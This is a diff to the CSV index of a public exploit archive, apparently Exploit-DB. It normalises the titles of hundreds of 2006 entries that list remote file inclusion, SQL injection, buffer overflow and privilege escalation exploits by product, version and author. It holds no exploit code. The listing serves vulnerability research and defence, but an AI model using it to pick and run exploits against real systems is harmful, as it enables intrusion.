1945,platforms/php/webapps/1945.pl,"w-Agora 4.2.0 - (inc_dir) Remote File Inclusion",2006-06-22,the_day,php,webapps,0 @@ -1670,7 +1670,7 @@ id,file,description,date,author,platform,type,port 1959,platforms/php/webapps/1959.txt,"RsGallery2 <= 1.11.2 - (rsgallery.html.php) File Include",2006-06-28,marriottvn,php,webapps,0 1960,platforms/php/webapps/1960.php,"BLOG:CMS 4.0.0k - SQL Injection",2006-06-28,rgod,php,webapps,0 1961,platforms/php/webapps/1961.txt,"XOOPS myAds Module - (lid) SQL Injection",2006-06-28,KeyCoder,php,webapps,0 -1962,platforms/osx/local/1962.pl,"Mac OS X 10.4.6 - (launchd) Local Format String Exploit (x86)",2006-06-28,"Kevin Finisterre",osx,local,0 +1962,platforms/osx/local/1962.pl,"Mac OSX 10.4.6 (x86) - (launchd) Local Format String Exploit",2006-06-28,"Kevin Finisterre",osx,local,0 1963,platforms/php/webapps/1963.txt,"GeekLog 1.4.0sr3 - (_CONF[path]) Remote File Inclusion",2006-06-29,Kw3[R]Ln,php,webapps,0 1964,platforms/php/webapps/1964.php,"GeekLog 1.4.0sr3 - 'f(u)ckeditor' Remote Code Execution",2006-06-29,rgod,php,webapps,0 1965,platforms/windows/remote/1965.pm,"Microsoft Windows - RRAS RASMAN Registry Stack Overflow (MS06-025) (Metasploit)",2006-06-29,Pusscat,windows,remote,445 @@ -1680,25 +1680,25 @@ id,file,description,date,author,platform,type,port 1970,platforms/php/webapps/1970.txt,"Plume CMS 1.1.3 - (dbinstall.php) Remote File Inclusion",2006-07-01,"Hamid Ebadi",php,webapps,0 1971,platforms/php/webapps/1971.txt,"Randshop 1.1.1 - (header.inc.php) Remote File Inclusion",2006-07-01,OLiBekaS,php,webapps,0 1972,platforms/multiple/dos/1972.txt,"Opera Web Browser 9.00 - (iframe) Remote Denial of Service",2006-07-01,y3dips,multiple,dos,0 -1973,platforms/osx/local/1973.pl,"Mac OS X 10.4.6 (PPC) - (launchd) Local Format String Exploit",2006-07-01,"Kevin Finisterre",osx,local,0 +1973,platforms/osx/local/1973.pl,"Mac OSX 10.4.6 (PPC) - (launchd) Local Format String Exploit",2006-07-01,"Kevin Finisterre",osx,local,0 1974,platforms/php/webapps/1974.txt,"SmartSiteCMS 1.0 - (root) Multiple Remote File Inclusion",2006-07-01,CrAsh_oVeR_rIdE,php,webapps,0 1975,platforms/php/webapps/1975.pl,"BXCP 0.3.0.4 - (where) SQL Injection",2006-07-02,x23,php,webapps,0 1976,platforms/windows/dos/1976.cpp,"Quake 3 Engine Client - CG_ServerCommand() Remote Overflow",2006-07-02,RunningBon,windows,dos,0 -1977,platforms/windows/dos/1977.cpp,"Quake 3 Engine Client - CS_ITEms Remote Overflow (Win32)",2006-07-02,RunningBon,windows,dos,0 +1977,platforms/windows/dos/1977.cpp,"Quake 3 Engine Client (Windows/x86) - CS_ITEms Remote Overflow",2006-07-02,RunningBon,windows,dos,0 1978,platforms/windows/local/1978.pl,"Microsoft Excel - Universal Hlink Local Buffer Overflow",2006-07-02,"SYS 49152",windows,local,0 1980,platforms/windows/dos/1980.pl,"ImgSvr 0.6.5 - (long http post) Denial of Service",2006-07-04,n00b,windows,dos,0 1981,platforms/php/webapps/1981.txt,"galleria Mambo Module 1.0b - Remote File Inclusion",2006-07-04,sikunYuk,php,webapps,0 1982,platforms/php/webapps/1982.txt,"WonderEdit Pro CMS (template_path) - Remote File Inclusion",2006-07-04,OLiBekaS,php,webapps,0 1983,platforms/php/webapps/1983.txt,"MyPHP CMS 0.3 - (domain) Remote File Inclusion",2006-07-05,Kw3[R]Ln,php,webapps,0 -1984,platforms/windows/dos/1984.py,"WinRAR 3.60 beta 6 - (SFX Path) Stack Overflow",2006-07-05,posidron,windows,dos,0 -1985,platforms/windows/local/1985.py,"WinRAR 3.60 beta 6 - (SFX Path) Local Stack Overflow",2006-07-05,muts,windows,local,0 +1984,platforms/windows/dos/1984.py,"WinRAR 3.60 Beta 6 - (SFX Path) Stack Overflow",2006-07-05,posidron,windows,dos,0 +1985,platforms/windows/local/1985.py,"WinRAR 3.60 Beta 6 - (SFX Path) Local Stack Overflow",2006-07-05,muts,windows,local,0 1986,platforms/windows/local/1986.cpp,"Microsoft Excel 2000/2003 - Hlink Local Buffer Overflow (French)",2006-07-06,NSRocket,windows,local,0 1987,platforms/asp/webapps/1987.txt,"Hosting Controller 6.1 Hotfix 3.1 - Privilege Escalation",2006-07-06,"Soroush Dalili",asp,webapps,0 1988,platforms/windows/local/1988.pl,"Microsoft Excel 2003 - Hlink Local Buffer Overflow (Italian)",2006-07-06,oveRet,windows,local,0 1989,platforms/windows/dos/1989.html,"Microsoft Internet Explorer 6 - Table.Frameset NULL Dereference",2006-07-07,"Aviv Raff",windows,dos,0 1990,platforms/windows/dos/1990.html,"Microsoft Internet Explorer 6 - (Internet.HHCtrl) Heap Overflow",2006-07-07,"H D Moore",windows,dos,0 1991,platforms/php/webapps/1991.php,"Pivot 1.30 RC2 - Privilege Escalation / Remote Code Execution Exploit",2006-07-07,rgod,php,webapps,0 -1992,platforms/windows/local/1992.py,"WinRAR 3.60 beta 6 - (SFX Path) Local Stack Overflow (French)",2006-07-07,"Jerome Athias",windows,local,0 +1992,platforms/windows/local/1992.py,"WinRAR 3.60 Beta 6 - (SFX Path) Local Stack Overflow (French)",2006-07-07,"Jerome Athias",windows,local,0 1993,platforms/php/webapps/1993.php,"PAPOO 3_RC3 - SQL Injection / Admin Credentials Disclosure Exploit",2006-07-07,rgod,php,webapps,0 1994,platforms/php/webapps/1994.txt,"SimpleBoard Mambo Component 1.1.0 - Remote File Inclusion",2006-07-08,h4ntu,php,webapps,0 1995,platforms/php/webapps/1995.txt,"com_forum Mambo Component 1.2.4RC3 - Remote File Inclusion",2006-07-08,h4ntu,php,webapps,0 @@ -1756,7 +1756,7 @@ id,file,description,date,author,platform,type,port 2054,platforms/windows/remote/2054.txt,"Microsoft Windows - DHCP Client Broadcast Attack Exploit (MS06-036)",2006-07-21,redsand,windows,remote,0 2056,platforms/windows/local/2056.c,"Microsoft IIS ASP - Stack Overflow (MS06-034)",2006-07-21,cocoruder,windows,local,0 2057,platforms/windows/dos/2057.c,"Microsoft Windows - Mailslot Ring0 Memory Corruption Exploit (MS06-035)",2006-07-21,cocoruder,windows,dos,0 -2058,platforms/php/webapps/2058.txt,"PHP Forge 3 beta 2 - (cfg_racine) Remote File Inclusion",2006-07-22,"Virangar Security",php,webapps,0 +2058,platforms/php/webapps/2058.txt,"PHP Forge 3 Beta 2 - (cfg_racine) Remote File Inclusion",2006-07-22,"Virangar Security",php,webapps,0 2059,platforms/hardware/dos/2059.cpp,"D-Link Router - UPNP Stack Overflow Denial of Service (PoC)",2006-07-22,ub3rst4r,hardware,dos,0 2060,platforms/php/webapps/2060.txt,"PHP Live! 3.2.1 - (help.php) Remote File Inclusion",2006-07-23,magnific,php,webapps,0 2061,platforms/multiple/remote/2061.txt,"Apache Tomcat < 5.5.17 - Remote Directory Listing",2006-07-23,"ScanAlert Security",multiple,remote,0 @@ -1803,12 +1803,12 @@ id,file,description,date,author,platform,type,port 2103,platforms/php/webapps/2103.txt,"k_shoutbox 4.4 - Remote File Inclusion",2006-08-01,"Kurdish Security",php,webapps,0 2104,platforms/php/webapps/2104.txt,"k_fileManager 1.2 - (dwl_include_path) Remote File Inclusion",2006-08-01,SHiKaA,php,webapps,0 2105,platforms/php/webapps/2105.php,"XMB 1.9.6 - (u2uid) SQL Injection Exploit (mq=off)",2006-08-01,rgod,php,webapps,0 -2106,platforms/osx/local/2106.pl,"Mac OS X 10.4.7 (x86) - 'fetchmail' Privilege Escalation",2006-08-01,"Kevin Finisterre",osx,local,0 -2107,platforms/osx/local/2107.pl,"Mac OS X 10.4.7 (PPC) - 'fetchmail' Privilege Escalation",2006-08-01,"Kevin Finisterre",osx,local,0 -2108,platforms/osx/local/2108.sh,"Mac OS X 10.4.7 - fetchmail Privilege Escalation",2006-08-01,"Kevin Finisterre",osx,local,0 +2106,platforms/osx/local/2106.pl,"Mac OSX 10.4.7 (x86) - 'fetchmail' Privilege Escalation",2006-08-01,"Kevin Finisterre",osx,local,0 +2107,platforms/osx/local/2107.pl,"Mac OSX 10.4.7 (PPC) - 'fetchmail' Privilege Escalation",2006-08-01,"Kevin Finisterre",osx,local,0 +2108,platforms/osx/local/2108.sh,"Mac OSX 10.4.7 - fetchmail Privilege Escalation",2006-08-01,"Kevin Finisterre",osx,local,0 2109,platforms/php/webapps/2109.txt,"WoW Roster 1.70 - (/lib/phpbb.php) Remote File Inclusion",2006-08-02,|peti,php,webapps,0 2110,platforms/php/webapps/2110.pm,"TWiki 4.0.4 - (Configure Script) Remote Code Execution Exploit (Metasploit)",2006-08-02,"David Maciejak",php,webapps,0 -2111,platforms/osx/local/2111.pl,"Mac OS X 10.3.8 - (CF_CHARSET_PATH) Local Buffer Overflow Exploit (2)",2006-08-02,"Kevin Finisterre",osx,local,0 +2111,platforms/osx/local/2111.pl,"Mac OSX 10.3.8 - (CF_CHARSET_PATH) Local Buffer Overflow Exploit (2)",2006-08-02,"Kevin Finisterre",osx,local,0 2113,platforms/php/webapps/2113.txt,"SaveWeb Portal 3.4 - (SITE_Path) Remote File Inclusion",2006-08-02,"Mehmet Ince",php,webapps,0 2114,platforms/php/webapps/2114.htm,"TinyPHP Forum 3.6 - (makeadmin) Remote Admin Maker Exploit",2006-08-02,SirDarckCat,php,webapps,0 2115,platforms/php/webapps/2115.txt,"Kayako eSupport 2.3.1 - (subd) Remote File Inclusion",2006-08-02,beford,php,webapps,0 @@ -1824,12 +1824,12 @@ id,file,description,date,author,platform,type,port 2125,platforms/php/webapps/2125.txt,"Joomla JD-Wiki Component 1.0.2 - Remote File Inclusion",2006-08-07,jank0,php,webapps,0 2127,platforms/php/webapps/2127.txt,"Modernbill 1.6 - (config.php) Remote File Inclusion",2006-08-07,Solpot,php,webapps,0 2128,platforms/php/webapps/2128.txt,"SAPID CMS 1.2.3.05 - (root_path) Remote File Inclusion",2006-08-07,Kacper,php,webapps,0 -2129,platforms/php/webapps/2129.txt,"SAPID Blog beta 2 - (root_path) Remote File Inclusion",2006-08-07,Kacper,php,webapps,80 +2129,platforms/php/webapps/2129.txt,"SAPID Blog Beta 2 - (root_path) Remote File Inclusion",2006-08-07,Kacper,php,webapps,80 2130,platforms/php/webapps/2130.txt,"SAPID Gallery 1.0 - (root_path) Remote File Inclusion",2006-08-07,Kacper,php,webapps,80 2131,platforms/php/webapps/2131.txt,"SAPID Shop 1.2 - (root_path) Remote File Inclusion",2006-08-07,Kacper,php,webapps,80 2132,platforms/php/webapps/2132.txt,"phpAutoMembersArea 3.2.5 - (installed_config_file) Remote File Inclusion",2006-08-07,"Philipp Niedziela",php,webapps,0 2133,platforms/php/webapps/2133.txt,"Simple CMS - Administrator Authentication Bypass",2006-08-07,daaan,php,webapps,0 -2134,platforms/php/webapps/2134.txt,"phpCC 4.2 beta - (base_dir) Remote File Inclusion",2006-08-07,Solpot,php,webapps,0 +2134,platforms/php/webapps/2134.txt,"phpCC 4.2 Beta - (base_dir) Remote File Inclusion",2006-08-07,Solpot,php,webapps,0 2135,platforms/php/webapps/2135.txt,"NEWSolved Lite 1.9.2 - (abs_path) Remote File Inclusion",2006-08-07,"Philipp Niedziela",php,webapps,0 2136,platforms/hardware/remote/2136.txt,"Barracuda Spam Firewall 3.3.03.053 - Remote Code Execution",2006-08-07,"Greg Sinclair",hardware,remote,0 2137,platforms/php/webapps/2137.txt,"QuestCMS - 'main.php' Remote File Inclusion",2006-08-07,Crackers_Child,php,webapps,0 @@ -1925,7 +1925,7 @@ id,file,description,date,author,platform,type,port 2228,platforms/asp/webapps/2228.txt,"SimpleBlog 2.0 - 'comments.asp' SQL Injection (1)",2006-08-20,"Chironex Fleckeri",asp,webapps,0 2229,platforms/php/webapps/2229.txt,"Shadows Rising RPG 0.0.5b - Remote File Inclusion",2006-08-20,Kacper,php,webapps,0 2230,platforms/asp/webapps/2230.txt,"LBlog 1.05 - (comments.asp) SQL Injection",2006-08-20,"Chironex Fleckeri",asp,webapps,0 -2231,platforms/php/webapps/2231.php,"Simple Machines Forum 1.1 rc2 - (lngfile) Remote Exploit (windows)",2006-08-20,rgod,php,webapps,0 +2231,platforms/php/webapps/2231.php,"Simple Machines Forum 1.1 rc2 (Windows) - (lngfile) Remote Exploit",2006-08-20,rgod,php,webapps,0 2232,platforms/php/webapps/2232.pl,"SimpleBlog 2.0 - 'comments.asp' SQL Injection (2)",2006-08-20,ASIANEAGLE,php,webapps,0 2233,platforms/windows/remote/2233.c,"WFTPD 3.23 - (SIZE) Remote Buffer Overflow",2006-08-21,h07,windows,remote,21 2234,platforms/windows/remote/2234.py,"Easy File Sharing FTP Server 2.0 - (PASS) Remote Exploit (PoC)",2006-08-21,h07,windows,remote,21 @@ -2025,8 +2025,8 @@ id,file,description,date,author,platform,type,port 2328,platforms/windows/remote/2328.php,"RaidenHTTPD 1.1.49 - (SoftParserFileXml) Remote Code Execution Exploit",2006-09-08,rgod,windows,remote,80 2329,platforms/php/webapps/2329.txt,"Somery 0.4.6 - (skin_dir) Remote File Inclusion",2006-09-08,basher13,php,webapps,0 2330,platforms/solaris/local/2330.c,"X11R6 <= 6.4 XKEYBOARD - Local Buffer Overflow (solaris/sparc) (1)",2006-09-08,"RISE Security",solaris,local,0 -2331,platforms/solaris/local/2331.c,"X11R6 <= 6.4 XKEYBOARD - Local Buffer Overflow (solaris/x86)",2006-09-08,"RISE Security",solaris,local,0 -2332,platforms/sco/local/2332.c,"X11R6 <= 6.4 XKEYBOARD - Local Buffer Overflow (sco/x86)",2006-09-08,"RISE Security",sco,local,0 +2331,platforms/solaris/local/2331.c,"X11R6 <= 6.4 XKEYBOARD (solaris/x86) - Local Buffer Overflow",2006-09-08,"RISE Security",solaris,local,0 +2332,platforms/sco/local/2332.c,"X11R6 <= 6.4 XKEYBOARD (sco/x86) - Local Buffer Overflow",2006-09-08,"RISE Security",sco,local,0 2333,platforms/php/webapps/2333.php,"CCleague Pro 1.0.1RC1 - (Cookie) Remote Code Execution Exploit",2006-09-08,Kacper,php,webapps,0 2334,platforms/windows/dos/2334.py,"Multithreaded TFTP 1.1 - (Long Get Request) Denial of Service",2006-09-08,n00b,windows,dos,0 2335,platforms/php/webapps/2335.txt,"MyABraCaDaWeb 1.0.3 - (base) Remote File Inclusion",2006-09-08,ddoshomo,php,webapps,0 @@ -2037,7 +2037,7 @@ id,file,description,date,author,platform,type,port 2340,platforms/php/webapps/2340.txt,"PUMA 1.0 RC 2 - (config.php) Remote File Inclusion",2006-09-10,"Philipp Niedziela",php,webapps,0 2341,platforms/php/webapps/2341.txt,"Open Bulletin Board 1.0.8 - (root_path) File Include",2006-09-10,Eddy_BAck0o,php,webapps,0 2342,platforms/php/webapps/2342.txt,"mcGalleryPRO 2006 - (path_to_folder) Remote File Inclusion",2006-09-10,Solpot,php,webapps,0 -2343,platforms/php/webapps/2343.txt,"MiniPort@l 0.1.5 beta - (skiny) Remote File Inclusion",2006-09-11,Kacper,php,webapps,0 +2343,platforms/php/webapps/2343.txt,"MiniPort@l 0.1.5 Beta - (skiny) Remote File Inclusion",2006-09-11,Kacper,php,webapps,0 2344,platforms/php/webapps/2344.txt,"OPENi-CMS 1.0.1beta - (config) Remote File Inclusion",2006-09-11,basher13,php,webapps,0 2345,platforms/windows/remote/2345.pl,"Mercur Mailserver 5.0 SP3 - (IMAP) Remote Buffer Overflow (2)",2006-09-11,"Jacopo Cervini",windows,remote,143 2346,platforms/php/webapps/2346.txt,"WTools 0.0.1a - (include_path) Remote File Inclusion",2006-09-11,ddoshomo,php,webapps,0 @@ -2048,7 +2048,7 @@ id,file,description,date,author,platform,type,port 2351,platforms/php/webapps/2351.txt,"Popper 1.41-r2 - (form) Remote File Inclusion",2006-09-12,SHiKaA,php,webapps,0 2352,platforms/php/webapps/2352.txt,"webSPELL 4.01.01 - Database Backup Download",2006-09-12,Trex,php,webapps,0 2353,platforms/php/webapps/2353.txt,"Vitrax Pre-modded 1.0.6-r3 - Remote File Inclusion",2006-09-12,CeNGiZ-HaN,php,webapps,0 -2354,platforms/php/webapps/2354.txt,"Signkorn Guestbook 1.3 - (dir_path) Remote File Inclusion",2006-09-12,SHiKaA,php,webapps,0 +2354,platforms/php/webapps/2354.txt,"Signkorn GuestBook 1.3 - (dir_path) Remote File Inclusion",2006-09-12,SHiKaA,php,webapps,0 2355,platforms/windows/remote/2355.pm,"Microsoft Windows 2003 - NetpIsRemote() Remote Overflow (MS06-040) (Metasploit)",2006-09-13,"Trirat Puttaraksa",windows,remote,445 2356,platforms/php/webapps/2356.txt,"Quicksilver Forums 1.2.1 - (set) Remote File Inclusion",2006-09-13,mdx,php,webapps,0 2357,platforms/php/webapps/2357.txt,"phpunity.postcard - (gallery_path) Remote File Inclusion",2006-09-13,Rivertam,php,webapps,0 @@ -2156,8 +2156,8 @@ id,file,description,date,author,platform,type,port 2460,platforms/windows/remote/2460.c,"Microsoft Internet Explorer - WebViewFolderIcon setSlice() Exploit",2006-09-29,LukeHack,windows,remote,0 2461,platforms/php/webapps/2461.txt,"VAMP Webmail 2.0beta1 - (yesno.phtml) Remote File Inclusion",2006-09-30,Drago84,php,webapps,0 2462,platforms/php/webapps/2462.txt,"phpMyWebmin 1.0 - (target) Remote File Inclusion",2006-09-30,"Mehmet Ince",php,webapps,0 -2463,platforms/osx/local/2463.c,"Mac OS X 10.4.7 - Mach Exception Handling Privilege Escalation",2006-09-30,xmath,osx,local,0 -2464,platforms/osx/local/2464.pl,"Mac OS X 10.4.7 - Mach Exception Handling Local Exploit (10.3.x)",2006-09-30,"Kevin Finisterre",osx,local,0 +2463,platforms/osx/local/2463.c,"Mac OSX 10.4.7 - Mach Exception Handling Privilege Escalation",2006-09-30,xmath,osx,local,0 +2464,platforms/osx/local/2464.pl,"Mac OSX 10.4.7 - Mach Exception Handling Local Exploit (10.3.x)",2006-09-30,"Kevin Finisterre",osx,local,0 2465,platforms/php/webapps/2465.php,"BasiliX 1.1.1 - (BSX_LIBDIR) Remote File Inclusion Exploit",2006-10-01,Kacper,php,webapps,0 2466,platforms/linux/local/2466.pl,"cPanel 10.8.x - (cpwrap via mysqladmin) Privilege Escalation",2006-10-01,"Clint Torrez",linux,local,0 2467,platforms/windows/remote/2467.pm,"McAfee ePo 3.5.0 / ProtectionPilot 1.1.0 - (Source) Remote Exploit (Metasploit)",2006-10-01,muts,windows,remote,81 @@ -2220,7 +2220,7 @@ id,file,description,date,author,platform,type,port 2524,platforms/bsd/dos/2524.c,"FreeBSD 5.4 / 6.0 - (ptrace PT_LWPINFO) Local Denial of Service",2006-10-12,kokanin,bsd,dos,0 2525,platforms/php/webapps/2525.pl,"phpBB Insert User Mod 0.1.2 - Remote File Inclusion Exploit",2006-10-12,"Nima Salehi",php,webapps,0 2526,platforms/php/webapps/2526.txt,"phpht Topsites - (common.php) Remote File Inclusion",2006-10-12,"Mehmet Ince",php,webapps,0 -2527,platforms/php/webapps/2527.c,"Invision Gallery 2.0.7 - ReadFile() / SQL Injection Exploit (Linux)",2006-10-12,ShadOS,php,webapps,0 +2527,platforms/php/webapps/2527.c,"Invision Gallery 2.0.7 (Linux) - ReadFile() / SQL Injection Exploit",2006-10-12,ShadOS,php,webapps,0 2528,platforms/php/webapps/2528.txt,"miniBB keyword_replacer 1.0 - (pathToFiles) File Include",2006-10-12,Kw3[R]Ln,php,webapps,0 2529,platforms/php/webapps/2529.txt,"AFGB GUESTBOOK 2.2 - (Htmls) Remote File Inclusion",2006-10-12,mdx,php,webapps,0 2530,platforms/windows/remote/2530.py,"BulletProof FTP Client 2.45 - Remote Buffer Overflow (PoC)",2006-10-12,h07,windows,remote,0 @@ -2274,7 +2274,7 @@ id,file,description,date,author,platform,type,port 2578,platforms/php/webapps/2578.txt,"phpMyManga 0.8.1 - (template.php) Multiple File Inclusion",2006-10-16,nuffsaid,php,webapps,0 2579,platforms/php/webapps/2579.pl,"WoltLab Burning Book 1.1.2 - SQL Injection Exploit (PoC)",2006-10-16,ShAnKaR,php,webapps,0 2580,platforms/osx/local/2580.pl,"Xcode OpenBase 9.1.5 (OSX) - (root file create) Privilege Escalation",2006-10-16,"Kevin Finisterre",osx,local,0 -2581,platforms/linux/local/2581.c,"NVIDIA Graphics Driver 8774 - Local Buffer Overflow",2006-10-16,"Rapid7 Security",linux,local,0 +2581,platforms/linux/local/2581.c,"Nvidia Graphics Driver 8774 - Local Buffer Overflow",2006-10-16,"Rapid7 Security",linux,local,0 2582,platforms/php/webapps/2582.txt,"ALiCE-CMS 0.1 - (CONFIG[local_root]) Remote File Inclusion",2006-10-17,nuffsaid,php,webapps,0 2583,platforms/php/webapps/2583.php,"WSN Forum 1.3.4 - (prestart.php) Remote Code Execution Exploit",2006-10-17,Kacper,php,webapps,0 2584,platforms/php/webapps/2584.pl,"PHPRecipeBook 2.35 - (g_rb_basedir) Remote File Inclusion Exploit",2006-10-17,r0ut3r,php,webapps,0 @@ -2321,7 +2321,7 @@ id,file,description,date,author,platform,type,port 2628,platforms/php/webapps/2628.pl,"JumbaCMS 0.0.1 - (includes/functions.php) Remote File Inclusion Exploit",2006-10-23,Kw3[R]Ln,php,webapps,0 2629,platforms/windows/dos/2629.html,"Microsoft Internet Explorer - (ADODB Execute) Denial of Service PoC",2006-10-24,"YAG KOHHA",windows,dos,0 2630,platforms/php/webapps/2630.txt,"InteliEditor 1.2.x - (lib.editor.inc.php) Remote File Inclusion",2006-10-24,"Mehmet Ince",php,webapps,0 -2631,platforms/php/webapps/2631.php,"Ascended Guestbook 1.0.0 - (embedded.php) File Include Exploit",2006-10-24,Kacper,php,webapps,0 +2631,platforms/php/webapps/2631.php,"Ascended GuestBook 1.0.0 - (embedded.php) File Include Exploit",2006-10-24,Kacper,php,webapps,0 2632,platforms/php/webapps/2632.pl,"CMS Faethon 2.0 - (mainpath) Remote File Inclusion Exploit",2006-10-24,r0ut3r,php,webapps,0 2633,platforms/hp-ux/local/2633.c,"HP-UX 11i - (swpackage) Stack Overflow Privilege Escalation",2006-10-24,prdelka,hp-ux,local,0 2634,platforms/hp-ux/local/2634.c,"HP-UX 11i - (swmodify) Stack Overflow Privilege Escalation",2006-10-24,prdelka,hp-ux,local,0 @@ -2354,7 +2354,7 @@ id,file,description,date,author,platform,type,port 2661,platforms/asp/webapps/2661.asp,"Php League 0.82 - (classement.php) SQL Injection",2006-10-27,ajann,asp,webapps,0 2662,platforms/asp/webapps/2662.txt,"Hosting Controller 6.1 Hotfix 3.2 - Unauthenticated Access",2006-10-27,"Soroush Dalili",asp,webapps,0 2663,platforms/php/webapps/2663.txt,"PhpShop Core 0.9.0 RC1 - (PS_BASE) File Inclusion",2006-10-28,"Cold Zero",php,webapps,0 -2664,platforms/php/webapps/2664.pl,"PHPMyDesk 1.0 beta - (viewticket.php) Local File Inclusion Exploit",2006-10-28,Kw3[R]Ln,php,webapps,0 +2664,platforms/php/webapps/2664.pl,"PHPMyDesk 1.0 Beta - (viewticket.php) Local File Inclusion Exploit",2006-10-28,Kw3[R]Ln,php,webapps,0 2665,platforms/php/webapps/2665.txt,"FreePBX 2.1.3 - (upgrade.php) Remote File Inclusion",2006-10-28,"Mehmet Ince",php,webapps,0 2666,platforms/php/webapps/2666.txt,"mp3SDS 3.0 - (Core/core.inc.php) Remote File Inclusion",2006-10-28,"Mehmet Ince",php,webapps,0 2667,platforms/php/webapps/2667.txt,"Electronic Engineering Tool (EE TOOL) 0.4.1 - File Include",2006-10-28,"Mehmet Ince",php,webapps,0 @@ -2370,11 +2370,11 @@ id,file,description,date,author,platform,type,port 2677,platforms/php/webapps/2677.asp,"Netref 4 - (cat_for_aff.php) Source Code Disclosure Exploit",2006-10-29,ajann,php,webapps,0 2678,platforms/php/webapps/2678.txt,"Faq Administrator 2.1 - (faq_reply.php) Remote File Inclusion",2006-10-29,v1per-haCker,php,webapps,0 2679,platforms/php/webapps/2679.txt,"PHPMyRing 4.2.1 - (cherche.php) SQL Injection",2006-10-29,ajann,php,webapps,0 -2680,platforms/windows/remote/2680.pm,"PrivateWire Gateway 3.7 - Remote Buffer Overflow (Win32) (Metasploit)",2006-10-29,"Michael Thumann",windows,remote,80 +2680,platforms/windows/remote/2680.pm,"PrivateWire Gateway 3.7 (Windows/x86) - Remote Buffer Overflow (Metasploit)",2006-10-29,"Michael Thumann",windows,remote,80 2681,platforms/php/webapps/2681.txt,"QnECMS 2.5.6 - (adminfolderpath) Remote File Inclusion Exploit",2006-10-30,K-159,php,webapps,0 2682,platforms/windows/dos/2682.pl,"Microsoft Windows - NAT Helper Components Remote Denial of Service (Perl)",2006-10-30,x82,windows,dos,0 2683,platforms/asp/webapps/2683.txt,"Techno Dreams Announcement - (key) SQL Injection",2006-10-30,ajann,asp,webapps,0 -2684,platforms/asp/webapps/2684.txt,"Techno Dreams Guestbook 1.0 - (key) SQL Injection",2006-10-30,ajann,asp,webapps,0 +2684,platforms/asp/webapps/2684.txt,"Techno Dreams GuestBook 1.0 - (key) SQL Injection",2006-10-30,ajann,asp,webapps,0 2685,platforms/php/webapps/2685.php,"Nitrotech 0.0.3a - (includes/common.php) Remote Code Execution Exploit",2006-10-30,Kacper,php,webapps,0 2686,platforms/php/webapps/2686.php,"phpBB Spider Friendly Module 1.3.10 - File Include Exploit",2006-10-30,Kacper,php,webapps,0 2687,platforms/php/webapps/2687.htm,"E Annu 1.0 - Login Bypass SQL Injection",2006-10-30,ajann,php,webapps,0 @@ -2471,12 +2471,12 @@ id,file,description,date,author,platform,type,port 2780,platforms/asp/webapps/2780.txt,"NetVIOS 2.0 - (page.asp) SQL Injection",2006-11-14,ajann,asp,webapps,0 2781,platforms/asp/webapps/2781.txt,"blogme 3.0 - (Cross-Site Scripting / Authentication Bypass) Multiple Vulnerabilities",2006-11-14,"Security Access Point",asp,webapps,0 2782,platforms/asp/webapps/2782.txt,"Hpecs Shopping Cart - Remote Login Bypass",2006-11-14,"Security Access Point",asp,webapps,0 -2783,platforms/windows/dos/2783.html,"WinZIP 10.0.7245 - (FileView ActiveX Control) Stack Overflow PoC",2006-11-14,prdelka,windows,dos,0 +2783,platforms/windows/dos/2783.html,"WinZip 10.0.7245 - (FileView ActiveX Control) Stack Overflow PoC",2006-11-14,prdelka,windows,dos,0 2784,platforms/multiple/remote/2784.html,"Links 1.00pre12 - (smbclient) Remote Code Execution Exploit",2006-11-14,"Teemu Salmela",multiple,remote,0 -2785,platforms/windows/remote/2785.c,"WinZIP 10.0.7245 - (FileView ActiveX) Remote Buffer Overflow",2006-11-15,prdelka,windows,remote,0 +2785,platforms/windows/remote/2785.c,"WinZip 10.0.7245 - (FileView ActiveX) Remote Buffer Overflow",2006-11-15,prdelka,windows,remote,0 2786,platforms/php/webapps/2786.txt,"torrentflux 2.2 - (Arbitrary File Create/ Execute / Delete) Multiple Vulnerabilities",2006-11-15,r0ut3r,php,webapps,0 2787,platforms/windows/dos/2787.c,"UniversalFTP 1.0.50 - (MKD) Remote Denial of Service",2006-11-15,"Greg Linares",windows,dos,0 -2788,platforms/osx/local/2788.pl,"Kerio WebSTAR 5.4.2 - (libucache.dylib) Privilege Escalation (OSX)",2006-11-15,"Kevin Finisterre",osx,local,0 +2788,platforms/osx/local/2788.pl,"Kerio WebSTAR 5.4.2 (OSX) - (libucache.dylib) Privilege Escalation",2006-11-15,"Kevin Finisterre",osx,local,0 2789,platforms/windows/remote/2789.cpp,"Microsoft Windows - NetpManageIPCConnect Stack Overflow (MS06-070)",2006-11-16,cocoruder,windows,remote,0 2790,platforms/php/webapps/2790.pl,"Etomite CMS 0.6.1.2 - (manager/index.php) Local File Inclusion Exploit",2006-11-16,Revenge,php,webapps,0 2791,platforms/php/webapps/2791.txt,"HTTP Upload Tool - 'download.php' Information Disclosure",2006-11-16,"Craig Heffner",php,webapps,0 @@ -2557,7 +2557,7 @@ id,file,description,date,author,platform,type,port 2879,platforms/windows/dos/2879.py,"Microsoft Windows - spoolss GetPrinterData() Remote Denial of Service",2006-12-01,h07,windows,dos,0 2880,platforms/windows/local/2880.c,"BlazeVideo HDTV Player 2.1 - Malformed PLF Buffer Overflow PoC",2006-12-01,"Greg Linares",windows,local,0 2881,platforms/asp/webapps/2881.txt,"Ultimate HelpDesk - Cross-Site Scripting / Local File Disclosure",2006-12-01,ajann,asp,webapps,0 -2882,platforms/php/webapps/2882.txt,"BBS E-Market Professional - (Full Full Path Disclosure / File Include) Multiple Vulnerabilities",2006-12-02,y3dips,php,webapps,0 +2882,platforms/php/webapps/2882.txt,"BBS E-Market Professional - (Full Path Disclosure / File Include) Multiple Vulnerabilities",2006-12-02,y3dips,php,webapps,0 2883,platforms/php/webapps/2883.txt,"simple file manager 0.24a - Multiple Vulnerabilities",2006-12-02,flame,php,webapps,0 2884,platforms/php/webapps/2884.txt,"awrate.com Message Board 1.0 - 'search.php' Remote File Inclusion",2006-12-02,DeltahackingTEAM,php,webapps,0 2885,platforms/php/webapps/2885.txt,"mxBB Module mx_tinies 1.3.0 - Remote File Inclusion",2006-12-02,bd0rk,php,webapps,0 @@ -2653,7 +2653,7 @@ id,file,description,date,author,platform,type,port 2977,platforms/php/webapps/2977.txt,"MKPortal M1.1.1 - (Urlobox) Cross-Site Request Forgery",2006-12-21,Demential,php,webapps,0 2978,platforms/windows/dos/2978.py,"XM Easy Personal FTP Server 5.2.1 - (USER) Format String Denial of Service",2006-12-22,shinnai,windows,dos,0 2979,platforms/php/webapps/2979.txt,"KISGB 5.1.1 - (authenticate.php) Remote File Inclusion",2006-12-22,mdx,php,webapps,0 -2980,platforms/php/webapps/2980.txt,"EternalMart Guestbook 1.10 - (admin/auth.php) Remote 